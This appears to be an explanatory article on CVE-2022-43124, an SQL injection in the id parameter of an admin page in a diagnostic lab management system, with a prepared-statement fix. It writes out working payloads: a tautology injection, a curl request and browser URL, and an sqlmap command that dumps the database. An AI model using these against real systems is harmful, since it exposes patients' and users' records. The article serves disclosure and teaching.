---
Online Diagnostic Lab Management System v1. might sound like a secure way to handle medical records and diagnostics, but in late 2022, it was found vulnerable to a rather basic SQL Injection bug. CVE-2022-43124 allows an attacker to bypass security by targeting the id parameter in a specific admin page. In this article, we'll break down how this vulnerability works, show a sample exploit, and reference the original sources.
What Is SQL Injection Anyway?
SQL Injection (SQLi) is a web security vulnerability that allows attackers to interfere with the queries an application makes to its database. By manipulating the input, adversaries bypass authentication, view sensitive data, or even modify/deleting records — all without valid access.
In Online Diagnostic Lab Management System v1., an administrative web interface lives at
/admin/?page=user/manage_user&id=<user-input>
The id parameter isn't properly sanitized or checked. This lets attackers input SQL code instead of a harmless user ID.
The Exploit Details
How does it work?
Suppose the backend code looks something like this (example in PHP)
<?php
// Vulnerable code (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id'";
$result = mysqli_query($conn, $query);
?>
If an attacker sets id=1' OR 1=1 --, the query becomes
SELECT * FROM users WHERE id = '1' OR 1=1 -- '
The OR 1=1 always evaluates true. The -- marks the rest as a comment, ignoring what's after. This could leak other users' data or give wider access.
A browser or command-line tool like curl is enough to test the vulnerability
curl "http://targetsite/admin/?page=user/manage_user&id=1'%20OR%201=1--";
Or, visit in your browser
http://targetsite/admin/?page=user/manage_user&id=1' OR 1=1--
You may see the table displaying more users than just the one with ID = 1… or even all users.
Tools like sqlmap automate this with a command like
sqlmap -u "http://targetsite/admin/?page=user/manage_user&id=1"; --cookie="admin_sessid=..." --risk=3 --level=5 --dump
Example (safe PHP with prepared statements)
$stmt = $conn->prepare('SELECT * FROM users WHERE id = ?');
$stmt->bind_param('i', $_GET['id']);
$stmt->execute();
References
- Exploit Database: CVE-2022-43124
- NVD - CVE-2022-43124 entry
- OWASP - SQL Injection
Final Word
Sometimes, old vulnerabilities still reappear in new software. CVE-2022-43124 is a classic reminder: never trust user input, especially in critical apps like diagnostic lab systems. If you run this application, patch immediately or mitigate exposures.
Timeline
Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 23:33:00 UTC